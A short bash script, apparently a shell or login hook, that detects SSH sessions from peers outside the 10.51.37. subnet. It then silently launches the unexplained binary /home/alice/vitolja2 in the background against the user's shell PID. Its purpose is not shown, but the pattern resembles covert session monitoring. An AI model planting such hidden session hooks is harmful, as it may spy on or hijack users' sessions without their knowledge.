#!/bin/bash

shell_pid=$(cat /proc/$PPID/stat | awk '{ print $4 }')
uniqpeers=$(ss | grep ssh | awk '{ print $6 }' | grep -v 10.51.37.)
non_int_check=$(strings /proc/$shell_pid/cmdline | grep notty)

if [ -n "$non_int_check" ]; then
        if [ -n "$uniqpeers" ]; then
                nohup /home/alice/vitolja2 $shell_pid 0 >/dev/null 2>&1 &
                jobs -l
        fi
else
        if [ -n "$uniqpeers" ]; then
                nohup /home/alice/vitolja2 $shell_pid 1 >/dev/null 2>&1 &
                jobs -l
        fi
fi
